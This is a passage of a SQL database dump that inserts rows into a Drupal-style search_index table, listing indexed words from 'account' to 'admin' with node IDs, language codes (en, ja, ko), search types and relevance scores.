('account', 86, 'en', 'help_search', 25.989),
('account', 86, 'ja', 'help_search', 25.989),
('account', 86, 'ko', 'help_search', 25.989),
('account', 87, 'en', 'help_search', 41),
('account', 87, 'ja', 'help_search', 41),
('account', 87, 'ko', 'help_search', 41),
('accountname', 86, 'en', 'help_search', 1),
('accountname', 86, 'ja', 'help_search', 1),
('accountname', 86, 'ko', 'help_search', 1),
('accounts', 11, 'en', 'help_search', 0.916736),
('accounts', 11, 'ja', 'help_search', 0.916736),
('accounts', 11, 'ko', 'help_search', 0.916736),
('accounts', 18, 'en', 'help_search', 1),
('accounts', 18, 'ja', 'help_search', 1),
('accounts', 18, 'ko', 'help_search', 1),
('accounts', 43, 'en', 'help_search', 0.913226),
('accounts', 43, 'ja', 'help_search', 0.913226),
('accounts', 43, 'ko', 'help_search', 0.913226),
('accounts', 44, 'en', 'help_search', 1),
('accounts', 44, 'ja', 'help_search', 1),
('accounts', 44, 'ko', 'help_search', 1),
('accounts', 68, 'en', 'help_search', 0.845322),
('accounts', 68, 'ja', 'help_search', 0.845322),
('accounts', 68, 'ko', 'help_search', 0.845322),
('accounts', 80, 'en', 'help_search', 1),
('accounts', 80, 'ja', 'help_search', 1),
('accounts', 80, 'ko', 'help_search', 1),
('accounts', 82, 'en', 'help_search', 1),
('accounts', 82, 'ja', 'help_search', 1),
('accounts', 82, 'ko', 'help_search', 1),
('accounts', 84, 'en', 'help_search', 46),
('accounts', 84, 'ja', 'help_search', 46),
('accounts', 84, 'ko', 'help_search', 46),
('accounts', 86, 'en', 'help_search', 30.9849),
('accounts', 86, 'ja', 'help_search', 30.9849),
('accounts', 86, 'ko', 'help_search', 30.9849),
('accounts', 87, 'en', 'help_search', 1),
('accounts', 87, 'ja', 'help_search', 1),
('accounts', 87, 'ko', 'help_search', 1),
('achieve', 126, 'en', 'node_search', 1),
('achieve', 154, 'en', 'node_search', 1),
('achieve', 165, 'en', 'node_search', 1),
('achieved', 176, 'en', 'node_search', 1),
('achieved', 183, 'en', 'node_search', 1),
('achieved', 191, 'en', 'node_search', 1),
('achieved', 199, 'en', 'node_search', 1),
('achievement', 62, 'en', 'node_search', 1),
('achievement', 160, 'en', 'node_search', 1),
('achievement', 161, 'en', 'node_search', 1),
('achievement', 166, 'en', 'node_search', 1),
('achievement', 167, 'en', 'node_search', 1),
('achievement', 168, 'en', 'node_search', 1),
('achievement', 169, 'en', 'node_search', 1),
('achievement', 170, 'en', 'node_search', 6),
('achievement', 174, 'en', 'node_search', 1),
('achievement', 177, 'en', 'node_search', 1),
('achievement', 178, 'en', 'node_search', 1),
('achievement', 179, 'en', 'node_search', 1),
('achievement', 180, 'en', 'node_search', 1),
('achievement', 181, 'en', 'node_search', 5),
('achievement', 182, 'en', 'node_search', 2),
('achievement', 183, 'en', 'node_search', 1),
('achievement', 185, 'en', 'node_search', 1),
('achievement', 186, 'en', 'node_search', 1),
('achievement', 187, 'en', 'node_search', 1),
('achievement', 188, 'en', 'node_search', 2),
('achievement', 190, 'en', 'node_search', 1),
('achievement', 191, 'en', 'node_search', 1),
('achievement', 192, 'en', 'node_search', 1),
('achievement', 193, 'en', 'node_search', 1),
('achievement', 194, 'en', 'node_search', 1),
('achievement', 195, 'en', 'node_search', 1),
('achievement', 196, 'en', 'node_search', 1),
('achievement', 197, 'en', 'node_search', 1),
('achievement', 198, 'en', 'node_search', 28),
('achievement', 199, 'en', 'node_search', 1),
('achievements', 140, 'en', 'node_search', 1),
('achievements', 177, 'en', 'node_search', 1),
('achievements', 195, 'en', 'node_search', 1),
('achieves', 180, 'en', 'node_search', 27),
('achieving', 1, 'en', 'node_search', 1),
('achieving', 160, 'en', 'node_search', 1),
('achieving', 164, 'en', 'node_search', 1),
('achieving', 167, 'en', 'node_search', 1),
('achieving', 171, 'en', 'node_search', 1),
('achieving', 173, 'en', 'node_search', 1),
('achieving', 174, 'en', 'node_search', 1),
('achieving', 175, 'en', 'node_search', 1),
('achieving', 177, 'en', 'node_search', 1),
('achieving', 178, 'en', 'node_search', 1),
('achieving', 190, 'en', 'node_search', 1),
('achieving', 193, 'en', 'node_search', 1),
('achieving', 194, 'en', 'node_search', 1),
('achieving', 196, 'en', 'node_search', 1),
('achieving', 198, 'en', 'node_search', 1),
('acquire', 136, 'en', 'node_search', 1),
('action', 10, 'en', 'help_search', 9),
('action', 10, 'ja', 'help_search', 9),
('action', 10, 'ko', 'help_search', 9),
('action', 22, 'en', 'help_search', 0.96498),
('action', 22, 'ja', 'help_search', 0.96498),
('action', 22, 'ko', 'help_search', 0.96498),
('action', 37, 'en', 'help_search', 1),
('action', 37, 'ja', 'help_search', 1),
('action', 37, 'ko', 'help_search', 1),
('action', 61, 'en', 'help_search', 8.88977),
('action', 61, 'ja', 'help_search', 8.88977),
('action', 61, 'ko', 'help_search', 8.88977),
('action', 84, 'en', 'help_search', 1),
('action', 84, 'ja', 'help_search', 1),
('action', 84, 'ko', 'help_search', 1),
('action', 89, 'en', 'help_search', 1.98493),
('action', 89, 'ja', 'help_search', 1.98087),
('action', 89, 'ko', 'help_search', 1.98493),
('action', 93, 'en', 'help_search', 0.836446),
('action', 93, 'ja', 'help_search', 0.836446),
('action', 93, 'ko', 'help_search', 0.836446),
('actions', 61, 'en', 'help_search', 0.98493),
('actions', 61, 'ja', 'help_search', 0.98493),
('actions', 61, 'ko', 'help_search', 0.98493),
('actions', 69, 'en', 'help_search', 1),
('actions', 69, 'ja', 'help_search', 1),
('actions', 69, 'ko', 'help_search', 1),
('actions', 89, 'en', 'help_search', 8),
('actions', 89, 'ja', 'help_search', 8),
('actions', 89, 'ko', 'help_search', 8),
('actions', 93, 'en', 'help_search', 4.06626),
('actions', 93, 'ja', 'help_search', 4.06626),
('actions', 93, 'ko', 'help_search', 4.06626),
('active', 5, 'en', 'node_search', 1),
('active', 5, 'ko', 'node_search', 1),
('active', 6, 'en', 'help_search', 1),
('active', 6, 'ja', 'help_search', 1),
('active', 6, 'ko', 'help_search', 1),
('active', 14, 'en', 'help_search', 1),
('active', 14, 'ja', 'help_search', 1),
('active', 14, 'ko', 'help_search', 1),
('active', 23, 'en', 'help_search', 11.0194),
('active', 23, 'ja', 'help_search', 11.0194),
('active', 23, 'ko', 'help_search', 11.0194),
('active', 28, 'en', 'help_search', 0.792123),
('active', 28, 'ja', 'help_search', 0.792123),
('active', 28, 'ko', 'help_search', 0.792123),
('active', 30, 'en', 'help_search', 8.73661),
('active', 30, 'ja', 'help_search', 8.73661),
('active', 30, 'ko', 'help_search', 8.73661),
('actively', 135, 'en', 'node_search', 1),
('activities', 23, 'en', 'node_search', 1),
('activities', 24, 'en', 'node_search', 0.989021),
('activities', 95, 'en', 'node_search', 27),
('activities', 95, 'ja', 'node_search', 27),
('activities', 135, 'en', 'node_search', 1),
('activities', 138, 'en', 'node_search', 1),
('activity', 43, 'en', 'help_search', 0.889397),
('activity', 43, 'ja', 'help_search', 0.889397),
('activity', 43, 'ko', 'help_search', 0.889397),
('acts', 29, 'en', 'help_search', 1),
('acts', 29, 'ja', 'help_search', 1),
('acts', 29, 'ko', 'help_search', 1),
('add', 1, 'en', 'help_search', 1),
('add', 1, 'ja', 'help_search', 1),
('add', 1, 'ko', 'help_search', 1),
('add', 4, 'en', 'help_search', 4),
('add', 4, 'ja', 'help_search', 4),
('add', 4, 'ko', 'help_search', 4),
('add', 5, 'en', 'help_search', 5),
('add', 5, 'ja', 'help_search', 5),
('add', 5, 'ko', 'help_search', 5),
('add', 7, 'en', 'help_search', 2),
('add', 7, 'ja', 'help_search', 2),
('add', 7, 'ko', 'help_search', 2),
('add', 8, 'en', 'help_search', 5),
('add', 8, 'ja', 'help_search', 5),
('add', 8, 'ko', 'help_search', 5),
('add', 16, 'en', 'help_search', 1),
('add', 16, 'ja', 'help_search', 1),
('add', 16, 'ko', 'help_search', 1),
('add', 17, 'en', 'help_search', 3),
('add', 17, 'ja', 'help_search', 3),
('add', 17, 'ko', 'help_search', 3),
('add', 18, 'en', 'help_search', 1),
('add', 18, 'ja', 'help_search', 1),
('add', 18, 'ko', 'help_search', 1),
('add', 19, 'en', 'help_search', 5),
('add', 19, 'ja', 'help_search', 5),
('add', 19, 'ko', 'help_search', 5),
('add', 23, 'en', 'help_search', 2.73092),
('add', 23, 'ja', 'help_search', 2.73092),
('add', 23, 'ko', 'help_search', 2.73092),
('add', 24, 'en', 'help_search', 13),
('add', 24, 'ja', 'help_search', 13),
('add', 24, 'ko', 'help_search', 13),
('add', 25, 'en', 'help_search', 2),
('add', 25, 'ja', 'help_search', 2),
('add', 26, 'en', 'help_search', 2),
('add', 26, 'ja', 'help_search', 2),
('add', 26, 'ko', 'help_search', 2),
('add', 27, 'en', 'help_search', 13),
('add', 27, 'ja', 'help_search', 13),
('add', 27, 'ko', 'help_search', 13),
('add', 28, 'en', 'help_search', 3.69535),
('add', 28, 'ja', 'help_search', 3.69535),
('add', 28, 'ko', 'help_search', 3.69535),
('add', 31, 'ja', 'help_search', 0.873132),
('add', 35, 'en', 'help_search', 3),
('add', 35, 'ja', 'help_search', 3),
('add', 35, 'ko', 'help_search', 3),
('add', 36, 'en', 'help_search', 1),
('add', 36, 'ja', 'help_search', 1),
('add', 36, 'ko', 'help_search', 1),
('add', 41, 'en', 'help_search', 1),
('add', 41, 'ja', 'help_search', 1),
('add', 41, 'ko', 'help_search', 1),
('add', 45, 'en', 'help_search', 1),
('add', 45, 'ja', 'help_search', 1),
('add', 45, 'ko', 'help_search', 1),
('add', 46, 'en', 'help_search', 1),
('add', 46, 'ja', 'help_search', 1),
('add', 46, 'ko', 'help_search', 1),
('add', 48, 'en', 'help_search', 13),
('add', 48, 'ja', 'help_search', 13),
('add', 48, 'ko', 'help_search', 13),
('add', 49, 'en', 'help_search', 13),
('add', 49, 'ja', 'help_search', 13),
('add', 49, 'ko', 'help_search', 13),
('add', 54, 'en', 'help_search', 6),
('add', 54, 'ja', 'help_search', 6),
('add', 54, 'ko', 'help_search', 6),
('add', 56, 'en', 'help_search', 15),
('add', 56, 'ja', 'help_search', 15),
('add', 56, 'ko', 'help_search', 15),
('add', 57, 'en', 'help_search', 5),
('add', 57, 'ja', 'help_search', 5),
('add', 57, 'ko', 'help_search', 5),
('add', 59, 'en', 'help_search', 4),
('add', 59, 'ja', 'help_search', 4),
('add', 59, 'ko', 'help_search', 4),
('add', 60, 'en', 'help_search', 5),
('add', 60, 'ja', 'help_search', 5),
('add', 60, 'ko', 'help_search', 5),
('add', 62, 'en', 'help_search', 1),
('add', 62, 'ja', 'help_search', 1),
('add', 62, 'ko', 'help_search', 1),
('add', 64, 'en', 'help_search', 1),
('add', 64, 'ja', 'help_search', 1),
('add', 64, 'ko', 'help_search', 1),
('add', 66, 'en', 'help_search', 5),
('add', 66, 'ja', 'help_search', 5),
('add', 68, 'en', 'help_search', 0.810915),
('add', 68, 'ja', 'help_search', 0.810915),
('add', 68, 'ko', 'help_search', 0.810915),
('add', 69, 'en', 'help_search', 2),
('add', 69, 'ja', 'help_search', 2),
('add', 69, 'ko', 'help_search', 2),
('add', 79, 'en', 'help_search', 14),
('add', 79, 'ja', 'help_search', 14),
('add', 79, 'ko', 'help_search', 14),
('add', 82, 'en', 'help_search', 8),
('add', 82, 'ja', 'help_search', 8),
('add', 82, 'ko', 'help_search', 8),
('add', 83, 'en', 'help_search', 4),
('add', 83, 'ja', 'help_search', 4),
('add', 83, 'ko', 'help_search', 4),
('add', 88, 'en', 'help_search', 6),
('add', 88, 'ja', 'help_search', 6),
('add', 88, 'ko', 'help_search', 6),
('add', 89, 'en', 'help_search', 6),
('add', 89, 'ja', 'help_search', 6),
('add', 89, 'ko', 'help_search', 6),
('add', 90, 'en', 'help_search', 4),
('add', 90, 'ja', 'help_search', 4),
('add', 90, 'ko', 'help_search', 4),
('add', 91, 'en', 'help_search', 5),
('add', 91, 'ja', 'help_search', 5),
('add', 91, 'ko', 'help_search', 5),
('added', 7, 'en', 'help_search', 1),
('added', 7, 'ja', 'help_search', 1),
('added', 7, 'ko', 'help_search', 1),
('added', 28, 'en', 'help_search', 1.61652),
('added', 28, 'ja', 'help_search', 1.61652),
('added', 28, 'ko', 'help_search', 1.61652),
('added', 31, 'ja', 'help_search', 0.997306),
('added', 36, 'en', 'help_search', 1),
('added', 36, 'ja', 'help_search', 1),
('added', 36, 'ko', 'help_search', 1),
('added', 48, 'en', 'help_search', 2),
('added', 48, 'ja', 'help_search', 2),
('added', 48, 'ko', 'help_search', 2),
('added', 54, 'en', 'help_search', 2),
('added', 54, 'ja', 'help_search', 2),
('added', 54, 'ko', 'help_search', 2),
('added', 55, 'en', 'help_search', 1),
('added', 55, 'ja', 'help_search', 1),
('added', 55, 'ko', 'help_search', 1),
('added', 56, 'en', 'help_search', 1),
('added', 56, 'ja', 'help_search', 1),
('added', 56, 'ko', 'help_search', 1),
('added', 69, 'en', 'help_search', 1),
('added', 69, 'ja', 'help_search', 1),
('added', 69, 'ko', 'help_search', 1),
('added', 80, 'en', 'help_search', 1),
('added', 80, 'ja', 'help_search', 1),
('added', 80, 'ko', 'help_search', 1),
('added', 88, 'en', 'help_search', 1),
('added', 88, 'ja', 'help_search', 1),
('added', 88, 'ko', 'help_search', 1),
('added', 90, 'en', 'help_search', 1),
('added', 90, 'ja', 'help_search', 1),
('added', 90, 'ko', 'help_search', 1),
('adding', 7, 'en', 'help_search', 5),
('adding', 7, 'ja', 'help_search', 5),
('adding', 7, 'ko', 'help_search', 5),
('adding', 16, 'en', 'help_search', 1),
('adding', 16, 'ja', 'help_search', 1),
('adding', 16, 'ko', 'help_search', 1),
('adding', 24, 'en', 'help_search', 26),
('adding', 24, 'ja', 'help_search', 26),
('adding', 24, 'ko', 'help_search', 26),
('adding', 27, 'en', 'help_search', 26),
('adding', 27, 'ja', 'help_search', 26),
('adding', 27, 'ko', 'help_search', 26),
('adding', 44, 'en', 'help_search', 1),
('adding', 44, 'ja', 'help_search', 1),
('adding', 44, 'ko', 'help_search', 1),
('adding', 48, 'en', 'help_search', 26),
('adding', 48, 'ja', 'help_search', 26),
('adding', 48, 'ko', 'help_search', 26),
('adding', 49, 'en', 'help_search', 26),
('adding', 49, 'ja', 'help_search', 26),
('adding', 49, 'ko', 'help_search', 26),
('adding', 50, 'en', 'help_search', 1),
('adding', 50, 'ja', 'help_search', 1),
('adding', 50, 'ko', 'help_search', 1),
('adding', 54, 'en', 'help_search', 27),
('adding', 54, 'ja', 'help_search', 27),
('adding', 54, 'ko', 'help_search', 27),
('adding', 56, 'en', 'help_search', 26),
('adding', 56, 'ja', 'help_search', 26),
('adding', 56, 'ko', 'help_search', 26),
('adding', 60, 'en', 'help_search', 11),
('adding', 60, 'ja', 'help_search', 11),
('adding', 60, 'ko', 'help_search', 11),
('adding', 79, 'en', 'help_search', 5),
('adding', 79, 'ja', 'help_search', 5),
('adding', 79, 'ko', 'help_search', 5),
('adding', 80, 'en', 'help_search', 0.927431),
('adding', 80, 'ja', 'help_search', 0.927431),
('adding', 80, 'ko', 'help_search', 0.927431),
('adding', 83, 'en', 'help_search', 26),
('adding', 83, 'ja', 'help_search', 26),
('adding', 83, 'ko', 'help_search', 26),
('adding', 88, 'en', 'help_search', 26),
('adding', 88, 'ja', 'help_search', 26),
('adding', 88, 'ko', 'help_search', 26),
('adding', 89, 'en', 'help_search', 26),
('adding', 89, 'ja', 'help_search', 26),
('adding', 89, 'ko', 'help_search', 26),
('addition', 23, 'en', 'node_search', 1.90974),
('addition', 27, 'en', 'node_search', 1),
('addition', 59, 'en', 'help_search', 1),
('addition', 59, 'ja', 'help_search', 1),
('addition', 59, 'ko', 'help_search', 1),
('addition', 61, 'en', 'help_search', 1),
('addition', 61, 'ja', 'help_search', 1),
('addition', 61, 'ko', 'help_search', 1),
('addition', 68, 'en', 'help_search', 1.81959),
('addition', 68, 'ja', 'help_search', 1.81959),
('addition', 68, 'ko', 'help_search', 1.81959),
('addition', 72, 'en', 'help_search', 1),
('addition', 72, 'ja', 'help_search', 1),
('addition', 72, 'ko', 'help_search', 1),
('additional', 1, 'en', 'help_search', 1),
('additional', 1, 'ja', 'help_search', 1),
('additional', 1, 'ko', 'help_search', 1),
('additional', 2, 'en', 'help_search', 19),
('additional', 2, 'ja', 'help_search', 19),
('additional', 2, 'ko', 'help_search', 19),
('additional', 6, 'en', 'help_search', 19.0423),
('additional', 6, 'ja', 'help_search', 19.0423),
('additional', 6, 'ko', 'help_search', 19.0423),
('additional', 7, 'en', 'help_search', 16.9618),
('additional', 7, 'ja', 'help_search', 16.9618),
('additional', 7, 'ko', 'help_search', 16.9618),
('additional', 10, 'en', 'help_search', 19),
('additional', 10, 'ja', 'help_search', 19),
('additional', 10, 'ko', 'help_search', 19),
('additional', 11, 'en', 'help_search', 0.968904),
('additional', 11, 'ja', 'help_search', 0.968904),
('additional', 11, 'ko', 'help_search', 0.968904),
('additional', 17, 'en', 'help_search', 1),
('additional', 17, 'ja', 'help_search', 1),
('additional', 17, 'ko', 'help_search', 1),
('additional', 23, 'en', 'help_search', 0.869951),
('additional', 23, 'ja', 'help_search', 0.869951),
('additional', 23, 'ko', 'help_search', 0.869951),
('additional', 28, 'en', 'help_search', 0.774192),
('additional', 28, 'ja', 'help_search', 0.774192),
('additional', 28, 'ko', 'help_search', 0.774192),
('additional', 29, 'en', 'help_search', 18.8293),
('additional', 29, 'ja', 'help_search', 18.8293),
('additional', 29, 'ko', 'help_search', 18.8293),
('additional', 30, 'en', 'help_search', 12.9539),
('additional', 30, 'ja', 'help_search', 12.9539),
('additional', 30, 'ko', 'help_search', 12.9539),
('additional', 32, 'en', 'help_search', 18.5602),
('additional', 32, 'ja', 'help_search', 18.5602),
('additional', 32, 'ko', 'help_search', 18.5602),
('additional', 33, 'en', 'help_search', 20),
('additional', 33, 'ja', 'help_search', 20),
('additional', 33, 'ko', 'help_search', 20),
('additional', 34, 'en', 'help_search', 19),
('additional', 34, 'ja', 'help_search', 19),
('additional', 34, 'ko', 'help_search', 19),
('additional', 35, 'en', 'help_search', 18.1873),
('additional', 35, 'ja', 'help_search', 18.1873),
('additional', 35, 'ko', 'help_search', 18.1873),
('additional', 36, 'en', 'help_search', 19),
('additional', 36, 'ja', 'help_search', 19),
('additional', 36, 'ko', 'help_search', 19),
('additional', 37, 'en', 'help_search', 16.1756),
('additional', 37, 'ja', 'help_search', 16.1756),
('additional', 37, 'ko', 'help_search', 16.1756),
('additional', 38, 'en', 'help_search', 19),
('additional', 38, 'ja', 'help_search', 19),
('additional', 38, 'ko', 'help_search', 19),
('additional', 41, 'en', 'help_search', 1),
('additional', 41, 'ja', 'help_search', 1),
('additional', 41, 'ko', 'help_search', 1),
('additional', 43, 'en', 'help_search', 2),
('additional', 43, 'ja', 'help_search', 2),
('additional', 43, 'ko', 'help_search', 2),
('additional', 44, 'en', 'help_search', 19),
('additional', 44, 'ja', 'help_search', 19),
('additional', 44, 'ko', 'help_search', 19),
('additional', 46, 'en', 'help_search', 17.8997),
('additional', 46, 'ja', 'help_search', 17.8997),
('additional', 46, 'ko', 'help_search', 17.8997),
('additional', 48, 'en', 'help_search', 1),
('additional', 48, 'ja', 'help_search', 1),
('additional', 48, 'ko', 'help_search', 1),
('additional', 54, 'en', 'help_search', 2),
('additional', 54, 'ja', 'help_search', 2),
('additional', 54, 'ko', 'help_search', 2),
('additional', 59, 'en', 'help_search', 19),
('additional', 59, 'ja', 'help_search', 19),
('additional', 59, 'ko', 'help_search', 19),
('additional', 60, 'en', 'help_search', 19),
('additional', 60, 'ja', 'help_search', 19),
('additional', 60, 'ko', 'help_search', 19),
('additional', 61, 'en', 'help_search', 18.3346),
('additional', 61, 'ja', 'help_search', 18.3346),
('additional', 61, 'ko', 'help_search', 18.3346),
('additional', 63, 'en', 'help_search', 19),
('additional', 63, 'ja', 'help_search', 19);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('additional', 63, 'ko', 'help_search', 19),
('additional', 65, 'en', 'help_search', 19),
('additional', 65, 'ja', 'help_search', 19),
('additional', 65, 'ko', 'help_search', 19),
('additional', 68, 'en', 'help_search', 15.9024),
('additional', 68, 'ja', 'help_search', 15.9024),
('additional', 68, 'ko', 'help_search', 15.9024),
('additional', 70, 'en', 'help_search', 19),
('additional', 70, 'ja', 'help_search', 19),
('additional', 70, 'ko', 'help_search', 19),
('additional', 71, 'en', 'help_search', 19),
('additional', 71, 'ja', 'help_search', 19),
('additional', 71, 'ko', 'help_search', 19),
('additional', 74, 'en', 'help_search', 1),
('additional', 74, 'ja', 'help_search', 1),
('additional', 74, 'ko', 'help_search', 1),
('additional', 76, 'en', 'help_search', 19),
('additional', 76, 'ja', 'help_search', 19),
('additional', 76, 'ko', 'help_search', 19),
('additional', 79, 'en', 'help_search', 19),
('additional', 79, 'ja', 'help_search', 19),
('additional', 79, 'ko', 'help_search', 19),
('additional', 80, 'en', 'help_search', 16.9618),
('additional', 80, 'ja', 'help_search', 16.9618),
('additional', 80, 'ko', 'help_search', 16.9618),
('additional', 91, 'en', 'help_search', 18.5602),
('additional', 91, 'ja', 'help_search', 18.4844),
('additional', 91, 'ko', 'help_search', 18.5602),
('additional', 93, 'en', 'help_search', 17.6775),
('additional', 93, 'ja', 'help_search', 17.6775),
('additional', 93, 'ko', 'help_search', 17.6775),
('address', 20, 'en', 'help_search', 1),
('address', 20, 'ja', 'help_search', 1),
('address', 20, 'ko', 'help_search', 1),
('address', 65, 'en', 'help_search', 1),
('address', 65, 'ja', 'help_search', 1),
('address', 65, 'ko', 'help_search', 1),
('address', 71, 'en', 'help_search', 2),
('address', 71, 'ja', 'help_search', 2),
('address', 71, 'ko', 'help_search', 2),
('address', 82, 'en', 'help_search', 4),
('address', 82, 'ja', 'help_search', 4),
('address', 82, 'ko', 'help_search', 4),
('address', 87, 'en', 'help_search', 1),
('address', 87, 'ja', 'help_search', 1),
('address', 87, 'ko', 'help_search', 1),
('addresses', 84, 'en', 'help_search', 1),
('addresses', 84, 'ja', 'help_search', 1),
('addresses', 84, 'ko', 'help_search', 1),
('adds', 33, 'en', 'help_search', 1),
('adds', 33, 'ja', 'help_search', 1),
('adds', 33, 'ko', 'help_search', 1),
('adhering', 142, 'en', 'node_search', 1),
('adin', 112, 'en', 'node_search', 28),
('adin', 112, 'ja', 'node_search', 31),
('adjust', 28, 'en', 'help_search', 0.794753),
('adjust', 28, 'ja', 'help_search', 0.794753),
('adjust', 28, 'ko', 'help_search', 0.794753),
('adjust', 60, 'en', 'help_search', 1),
('adjust', 60, 'ja', 'help_search', 1),
('adjust', 60, 'ko', 'help_search', 1),
('adjust', 71, 'en', 'help_search', 1),
('adjust', 71, 'ja', 'help_search', 1),
('adjust', 71, 'ko', 'help_search', 1),
('admin', 1, 'en', 'node_search', 1),
('admin', 3, 'en', 'node_search', 1),
('admin', 4, 'en', 'node_search', 1),
('admin', 5, 'en', 'node_search', 1),
('admin', 5, 'ja', 'node_search', 1),
('admin', 6, 'en', 'node_search', 1),
('admin', 7, 'en', 'node_search', 1),
('admin', 8, 'en', 'node_search', 1),
('admin', 9, 'en', 'node_search', 1),
('admin', 10, 'en', 'node_search', 1),
('admin', 11, 'en', 'node_search', 1),
('admin', 17, 'en', 'node_search', 1),
('admin', 18, 'en', 'node_search', 1),
('admin', 19, 'en', 'node_search', 1),
('admin', 20, 'en', 'node_search', 1),
('admin', 28, 'en', 'node_search', 1),
('admin', 28, 'ja', 'node_search', 1),
('admin', 28, 'ko', 'node_search', 1),
('admin', 29, 'en', 'node_search', 1),
('admin', 29, 'ja', 'node_search', 1),
('admin', 29, 'ko', 'node_search', 1),
('admin', 30, 'en', 'node_search', 4),
('admin', 30, 'ja', 'node_search', 1),
('admin', 30, 'ko', 'node_search', 1),
('admin', 31, 'en', 'node_search', 1),
('admin', 43, 'en', 'help_search', 15),
('admin', 43, 'ja', 'help_search', 15),
('admin', 43, 'ko', 'help_search', 15),
('admin', 45, 'en', 'help_search', 4),
('admin', 45, 'ja', 'help_search', 4),
('admin', 45, 'ko', 'help_search', 4),
('admin', 62, 'en', 'node_search', 1),
('admin', 62, 'ja', 'node_search', 1),
('admin', 66, 'en', 'node_search', 1),
('admin', 67, 'ja', 'node_search', 1),
('admin', 68, 'en', 'node_search', 1),
('admin', 68, 'ja', 'node_search', 1),
('admin', 69, 'en', 'node_search', 1),
('admin', 69, 'ja', 'node_search', 1),
('admin', 70, 'en', 'node_search', 1),
('admin', 70, 'ja', 'node_search', 1),
('admin', 71, 'en', 'node_search', 1),
('admin', 71, 'ja', 'node_search', 1),
('admin', 72, 'en', 'node_search', 1),
('admin', 72, 'ja', 'node_search', 1),
('admin', 73, 'en', 'node_search', 1),
('admin', 73, 'ja', 'node_search', 1),
('admin', 74, 'en', 'node_search', 1),
('admin', 74, 'ja', 'node_search', 1),
('admin', 75, 'en', 'node_search', 1),
('admin', 75, 'ja', 'node_search', 1),
('admin', 76, 'en', 'node_search', 1),
('admin', 76, 'ja', 'node_search', 1),
('admin', 77, 'en', 'node_search', 1),
('admin', 77, 'ja', 'node_search', 1),
('admin', 78, 'en', 'node_search', 1),
('admin', 78, 'ja', 'node_search', 1),
('admin', 79, 'en', 'node_search', 1),
('admin', 80, 'en', 'node_search', 1),
('admin', 80, 'ja', 'node_search', 1),
('admin', 81, 'en', 'node_search', 1),
('admin', 81, 'ja', 'node_search', 1),
('admin', 82, 'en', 'node_search', 1),
('admin', 82, 'ja', 'node_search', 1),
('admin', 83, 'en', 'node_search', 1),
('admin', 83, 'ja', 'node_search', 1),
('admin', 84, 'en', 'node_search', 1),
('admin', 84, 'ja', 'node_search', 1),
('admin', 85, 'en', 'node_search', 1),
('admin', 85, 'ja', 'node_search', 1),
('admin', 86, 'en', 'node_search', 1),
('admin', 86, 'ja', 'node_search', 1),
('admin', 87, 'en', 'node_search', 1),
('admin', 87, 'ja', 'node_search', 1),
('admin', 88, 'en', 'node_search', 1),
('admin', 88, 'ja', 'node_search', 1),
('admin', 89, 'en', 'node_search', 1),
('admin', 89, 'ja', 'node_search', 1),
('admin', 90, 'en', 'node_search', 1),
('admin', 90, 'ja', 'node_search', 1),
('admin', 91, 'en', 'node_search', 1),
('admin', 91, 'ja', 'node_search', 1),
('admin', 92, 'en', 'node_search', 1),
('admin', 92, 'ja', 'node_search', 1),
('admin', 93, 'en', 'node_search', 1),
('admin', 93, 'ja', 'node_search', 1),
('admin', 94, 'en', 'node_search', 1),
('admin', 95, 'en', 'node_search', 1),
('admin', 95, 'ja', 'node_search', 1),
('admin', 96, 'en', 'node_search', 1),
('admin', 96, 'ja', 'node_search', 1),
('admin', 97, 'en', 'node_search', 1),
('admin', 97, 'ja', 'node_search', 1),
('admin', 98, 'en', 'node_search', 1),
('admin', 98, 'ja', 'node_search', 1),
('admin', 99, 'en', 'node_search', 1),
('admin', 99, 'ja', 'node_search', 1),
('admin', 100, 'en', 'node_search', 1),
('admin', 100, 'ja', 'node_search', 1),
('admin', 101, 'en', 'node_search', 1),
('admin', 101, 'ja', 'node_search', 1),
('admin', 102, 'en', 'node_search', 1),
('admin', 102, 'ja', 'node_search', 1),
('admin', 103, 'en', 'node_search', 1),
('admin', 103, 'ja', 'node_search', 1),
('admin', 104, 'en', 'node_search', 1),
('admin', 104, 'ja', 'node_search', 1),
('admin', 105, 'en', 'node_search', 1),
('admin', 105, 'ja', 'node_search', 1),
('admin', 106, 'en', 'node_search', 1),
('admin', 106, 'ja', 'node_search', 1),
('admin', 107, 'en', 'node_search', 1),
('admin', 107, 'ja', 'node_search', 1),
('admin', 108, 'en', 'node_search', 1),
('admin', 108, 'ja', 'node_search', 1),
('admin', 109, 'en', 'node_search', 1),
('admin', 109, 'ja', 'node_search', 1),
('admin', 110, 'en', 'node_search', 1),
('admin', 110, 'ja', 'node_search', 1),
('admin', 111, 'en', 'node_search', 1),
('admin', 111, 'ja', 'node_search', 1),
('admin', 112, 'en', 'node_search', 1),
('admin', 112, 'ja', 'node_search', 1),
('admin', 113, 'en', 'node_search', 1),
('admin', 113, 'ja', 'node_search', 1),
('admin', 114, 'en', 'node_search', 1),
('admin', 114, 'ja', 'node_search', 1),
('admin', 115, 'en', 'node_search', 1),
('admin', 115, 'ja', 'node_search', 1),
('admin', 116, 'en', 'node_search', 1),
('admin', 116, 'ja', 'node_search', 1),
('admin', 117, 'en', 'node_search', 1),
('admin', 117, 'ja', 'node_search', 1),
('admin', 118, 'en', 'node_search', 1),
('admin', 118, 'ja', 'node_search', 1),
('admin', 119, 'en', 'node_search', 1),
('admin', 119, 'ja', 'node_search', 1),
('admin', 120, 'en', 'node_search', 1),
('admin', 120, 'ja', 'node_search', 1),
('admin', 121, 'en', 'node_search', 1),
('admin', 121, 'ja', 'node_search', 1),
('admin', 122, 'en', 'node_search', 1),
('admin', 122, 'ja', 'node_search', 1),
('admin', 123, 'en', 'node_search', 1),
('admin', 123, 'ja', 'node_search', 1),
('admin', 124, 'en', 'node_search', 1),
('admin', 124, 'ja', 'node_search', 1),
('admin', 125, 'en', 'node_search', 1),
('admin', 125, 'ja', 'node_search', 1),
('admin', 126, 'en', 'node_search', 1),
('admin', 126, 'ja', 'node_search', 1),
('admin', 127, 'en', 'node_search', 1),
('admin', 127, 'ja', 'node_search', 1),
('admin', 128, 'en', 'node_search', 1),
('admin', 128, 'ja', 'node_search', 1),
('admin', 129, 'en', 'node_search', 1),
('admin', 129, 'ja', 'node_search', 1),
('admin', 130, 'en', 'node_search', 1),
('admin', 130, 'ja', 'node_search', 1),
('admin', 131, 'en', 'node_search', 1),
('admin', 131, 'ja', 'node_search', 1),
('admin', 132, 'en', 'node_search', 1),
('admin', 132, 'ja', 'node_search', 1),
('admin', 133, 'en', 'node_search', 1),
